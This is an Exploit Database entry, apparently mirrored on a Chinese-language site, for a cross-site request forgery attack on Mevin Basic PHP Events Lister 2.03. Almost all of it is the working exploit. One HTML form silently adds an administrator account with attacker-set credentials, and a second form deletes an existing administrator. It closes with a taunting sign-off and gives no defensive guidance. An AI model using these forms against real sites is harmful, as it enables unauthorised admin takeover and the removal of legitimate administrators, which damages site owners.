Mevin Basic PHP Events Lister 2.03 – Cross-Site Request Forgery

• Exploit Database
• 9 阅读

• 作者： Crazy_Hacker
  日期： 2011-07-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17554/

• #######################################################
  #	Author:			Crazy_Hacker
  #	Script:			Mevin Basic PHP Events Lister v2.03
  #	Exploit type: 	CSRF Vulnerability [Add & Delete Admin]
  #	Download:		http://www.mevin.com/downloads/Basic-php-events-lister2.03.zip
  # 	Risk: 			High
  #	Contact:		jy8@hotmail.com
  #######################################################
  
  
  <form name="setup" action="http://127.0.0.1/events2/admin/user_add.php" method="post">
  <input name="uname" type="hidden" value="Crazy_Hacker" />
  <input name="pword" type="hidden" value="PWNED!!" /> 
  <input type=submit name=submit value="Add Admin">
  </form>
  <form action="http://localhost/events2/admin/user_delete.php?id=8" method="post">
  <input type="hidden" name="ud_id" value="8">
  <input type="submit" name="submit" value="Delete Admin">
  </form>
  
  				\\// S3crity just Suck5 \\//
  				
  #EOF